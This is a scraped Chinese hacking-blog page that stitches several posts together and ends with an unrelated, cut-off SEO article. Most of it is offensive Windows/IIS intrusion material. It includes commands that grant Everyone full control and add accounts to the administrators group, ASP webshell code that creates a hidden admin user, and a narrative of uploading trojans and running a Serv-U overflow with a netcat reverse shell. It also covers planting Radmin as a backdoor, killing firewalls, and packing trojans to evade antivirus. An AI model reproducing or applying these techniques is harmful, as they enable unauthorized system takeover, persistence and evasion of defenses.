<331 User name okay, need password. 

****************************************************** 

>PASS 111111 

<230 User logged in, proceed. 

****************************************************** 

[+] Now Executing: cacls.exe c: /E /T /G everyone:F 

<220 Domain deleted
这样所有分区为everyone完全控制
现在我们把自己的用户提升为管理员: 

http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add" 


6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限
用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再将asp.dll加入特权一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升,好象效果不明显
<%@codepage=936%><%Response.Expires=0 
on error resume next 
Session.TimeOut=50 
Server.ScriptTimeout=3000 
set lp=Server.createObject("WSCRIPT.NETWORK") 
oz="WinNT://"&lp.ComputerName 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=ob.create("user","WekweN$") 
od.SetPassword "WekweN" <-----密码
od.SetInfo 
Set of=GetObject(oz&"/WekweN$,user") 
oe.Add(of.ADsPath) 
Response.write "WekweN$ 超级帐号建立成功!"%>


用这段代码检查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next '查找Administrators组帐号
Set tN=server.createObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>

8.C:\Program Files\Java Web Start这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。

9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。

等到主机重启或者你ddos逼它重启,来达到权限提升的目的。


总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"

以上是本人的拙见,大家有什么好的方法多多分享 
WekweN 
04.12.12


如何绕过防火墙提升权限


本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。

废话少说,咱们进入正题。

首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。

测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些LJ文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。

思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。

传上了srv.exe和nc.exe在H:\long\sun***\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D:\Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。

可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。

不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\,运行 srv.exe "nc.exe -e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc -l -p 888。我们在学校内网里,没有公网ip,不爽-ing。

我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)

高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用刚才nc得到的shell把它们copy到d:\winnt\system32\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。

一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\program files\serv-u\里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)

不管了,我们重启serv-u就ok了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。

好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:

ftp>quote site exec net user xr rain /add

在webshell上运行net user,就可以看见添加成功了。

整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。


winNT/2000提升权限 

  Windows NT/2000 通用的提升方法

  攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。

  本文简要介绍在 Windows NT4和 Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法:

  方法1 :下载系统的 %windir%\repair\sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。

  问题:(1 )攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2 )这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。

  方法2 :使用pwdump(L0pht 自带的,Windows 2000下无效)或者pwdump2 ,取得系统当前的用户列表和口令加密列表,然后用L0pht 破解这个列表。

  问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer 身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。

  (以上两种是离线的)

  方法3 :使用 Enum 等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。

  问题:(1 )如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2 )要远程系统开放 Netbios连接,就是 TCP的139 端口,如果用防火墙过滤了的话 Enum 就无法连接到主机。

  (以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。)

  方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本机运行可以把当前用户帐号加入管理员组。而 PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。

  问题:GetAdmin在 SP4有补丁修复了,不能用于高于 SP4的 WinNT 4系统,当然后来又有GetAdmin的增强版本,不过在 SP6a 下好像都不能成功运行。

  注:这一方法利用了 WinNT 4系统的安全漏洞,可以安装补丁解决这一问题。

  (此外还有变通的方法。)

  方法5 :在WinNT 4 和 Windows 2000 注册表里指定用户Shell 程序(Explorer.exe)

  时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。

  由于在系统启动时程序的搜索顺序问题使得 %Systemdrive%\Explorer.exe(操作系统安装的跟目录下的Explorer.exe)程序执行,这提供了攻击者一个机会在用户下次登录时执行他自己的程序。

  问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。

  注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。

  方法6 :木马:上传木马,然后运行木马,系统重起动后,木马就是本地登录用户的身份了,然后攻击者连接后就有了本地登录用户的权限。因为一般总是管理员本地登录系统,因此这样很可能就获得了管理员的权限。

  问题:(1 )杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。

  (2 )有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system%\system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。

  解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。

  方法7 :Gina、GinaStub木马。虽然这个也叫木马,但是它的功能和上边的那种大不相同,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接到server端,并进行操作。而 ginastub 一般只有一个动态连接库文件,需要手工安装和卸载,他的功能也不是使用client端控制server端,它仅仅就是捕获用户的登录密码。

  问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。

  注:这一方法利用的不是系统的安全漏洞,因此不能通过安装补丁解决这一问题。关于Gina,可以参见我的另一篇文章《WinLogon登录管理和GINA简介》

  方法8 :本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。Win NT4 的 IIS4 的 ASP扩展有一个本地溢出漏洞,Windows 2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然 Windows NT 和 Windows 2000 还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。

  问题:(1 )ASP 扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。

  (2 )静态图像服务缺省没有安装,只有用户在 Windows 2000 上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。

  注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。

  Windows 2000专用提升漏洞方法方法1 : Windows 2000 的输入法漏洞,利用这个漏洞任何人可以以LocalSystem 身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触 Windows 2000 计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

  方法2 :利用 Windows 2000 的 Network DDE DSDM 服务漏洞普通用户可以LocalSystem 身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。

  问题:这个服务缺省没有启动,需要启动这个服务。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

  方法3 :Windows 2000的 TELNET 服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果 TELNET 发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次 TELNET 创建服务进程时,便会在本地 SYSTEM 环境中运行攻击者代码。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。

  方法4 :WINDOWS 2K存在一个利用 Debug Registers提升权限的漏洞。如果攻击者能在 WIN2K中运行程序,利用此漏洞,他至少能取得对 %Windir%\SYSTEM32和注册表HKCR的写权。因为x86 Debug Registers DR0-7 对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。

  注:这一方法利用了 Windows 2000 系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。


巧用asp木马和KV2004得到管理员权限 

]]> http://www.loveni.net/log/default.asp?id=18 <![CDATA[vbs文件来提升asp木马的权限]]> admin http://www.loveni.net/log/ admin@loveni.net 2006-12-13T01:33:30+08:00 2006-12-13T01:33:30+08:00 ======================================================== 
set wsh=createobject("wscript.shell") '创建一个wsh对象 
a=wsh.run ("cmd.exe /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps C:\WINNT\system32\inetsrv\httpext.dll C:\WINNT\system32\inetsrv\httpodbc.dll C:\WINNT\system32\inetsrv\ssinc.dll C:\WINNT\system32\msw3prt.dll C:\winnt\system32\inetsrv\asp.dll",0) '加入asp.dll到InProcessIsapiApps中 
======================================================== 
将其保存为vbs的后缀,再上传到服务上, 
然后利用asp木马执行这个vbs文件后。再试试你的asp木马吧,你会发现自己己经是system权限了  
]]> http://www.loveni.net/log/default.asp?id=17 <![CDATA[GOOGLE百度破解,网站优化SEO最终详解]]> admin http://www.loveni.net/log/ admin@loveni.net 2006-12-13T01:28:34+08:00 2006-12-13T01:28:34+08:00 大家都是做网站的,有的是爱好,有的就是靠网站吃饭的,21世界网站最重要的是什么?流量!!! 
那怎么才能提高流量呢,小弟现丑了,其实在座的各位肯定有懂的比我多的。 
主要嘛,提高流量就是从网站的自身去考虑了,简单来说,就是要对自己网站进行一个整体的SEO页面搜索引擎优化。 
何谓“SEO”?简单的解释就是,通过人为的调整和设计,让你的网站在搜索引擎(主要以Google为主,baidu因为有竞价排名,人为对搜索结果的干扰很大,这也是为何有人说“Google是干事业的,百度是做买卖的”,不过只要你的网站在Google中能取得好名次,那么在其它搜索引擎中也不会太坏。)的搜索结果中排名靠前,靠前的好处不用讲,自然是增加网站被点击的机会了,很少有人喜欢去翻上10几页去找一个网站吧,当然,耐心好时间多的朋友例外,要么就是你有特别的目的,比如:帮女朋友找一首很老的歌,如果找不到,咱们就分手^_^ 
    目前网上专业提供SEO服务的公司很多,鱼龙混杂,不管如何,他们共同的特点就是把自己说的神乎其神,与之接触必曰:“你的网站交给我优化,xx期限内,让你的网站出现在xx搜索引擎的xx位置上云云”,有这么厉害吗?还真有这么厉害,当然,我说的是那些有真本事的公司,不是骗子。 
    本人对SEO的了解也很有限,不过我不是骗子,呵呵,因为我没骗你钱,当然如果你看完了下边的文字觉得没什么意义,那我就是骗子了,因为我骗了你的时间,而时间=金钱。 
    关于SEO的经验、教程,网上有很多,什么“关键字密度”、“PR值”、“动态页面静态化”等等,感兴趣的朋友去Google一下就知道了,乍一看很复杂,不错,是很麻烦,但大家也不要敬而远之,SEO并没有你想象的那么神秘,理由: 
    1、没有人知道如何做才算得上是有效的SEO,因为所谓的SEO都是大家总结出来的既往经验,Google不可能让你随意的操纵它的搜索结果,否则天下岂不打乱?从这一点上说,所谓的SEO这一行当中的高手无非就是比你多过了几座桥,道熟而已,别把他们当神看,喝多也吐^_^ 
    2、因为中文语法、构词的复杂性,国外SEO的经验并不符合我们的国情,也就是说能优化好一个英文网站并不等于能优化好一个中文网站,这也就意味着对于我们、中国人来说,优化自己的网站可能会简单一些,呵呵,因为个别用在英文网站上的招术到我们这里失效了,也就不用学了。 
    3、“谋事在人,成事在天”,不是说你对网站做了个把优化后你的网站一下子就跑到搜索结果的Top1了,因为还有网站流量、网站流量等多方面的因素,试想,一个无人问津的网站就是优化的再好,也难以想象它会被Google所青睐。所以,大家还是应该把心思放在如何网上网站内容和服务上,靠实力,靠网友的口碑,这才是一个网站真正的立足之地,而对于SEO,大家应该持有一个平和心态:我会尽量让自己的网站取悦Google,但不是为了取悦而取悦,甚至用歪门邪道作弊,绝没有好下场! 
    接下来,我就向大家介绍一下自己在SEO方面的心得体会,大家可以试着照做,未必有效,但绝对无害^_^ 
    ★页面主题优化 
    一个页面的<title></title>部分是很重要的,许多SEO都坚信,Google会优先寻找这里的文字,因此好多网站就疯狂的在这里写下一堆关键字,希望增加被搜索的概率。 
呵呵,你会觉得Google这么傻吗?这么容易就被一个title所左右了?其实,我们不妨老实一些,实事求是的写下自己网站的名字,当然,网站的名字要考虑好,最好包含网站的主要内容 
    ★页面头部优化 
    页面头部指的是代码中<head></head>部分,具体一点就是<meta>中的“Description(描述)”和“Keywords(关键字)”两部分,这部分也是SEO们比较花心思的地方,理论一大堆!总结起来就是: 
    1、“描述”部分应该用近乎描述的语言写下一段介绍你网站的文字,在这其中,你应该适当的对你网站的特色内容加以重复以求突出,比如: 
    <meta name="description" content="网智成提供网站策划,网站设计,域名服务,域名主机,主机空间,网站制作,网站优化,seo优化,网站推广,网站保姆,网站维护,网络营销,网站医生,技术寻租,网站技术,网络人才出租等各项服务;网智成的营销文库里含概了大量的seo技术应用、网站推广等相关的网络营销知识;网智成给广大的客户群体提供网站策划,版面栏目规划,网络市场调查等贴心的保姆服务,大量的网站网络基础、域名选用及网站程序、网站美工相关的知识让您成为一个网站网络技术型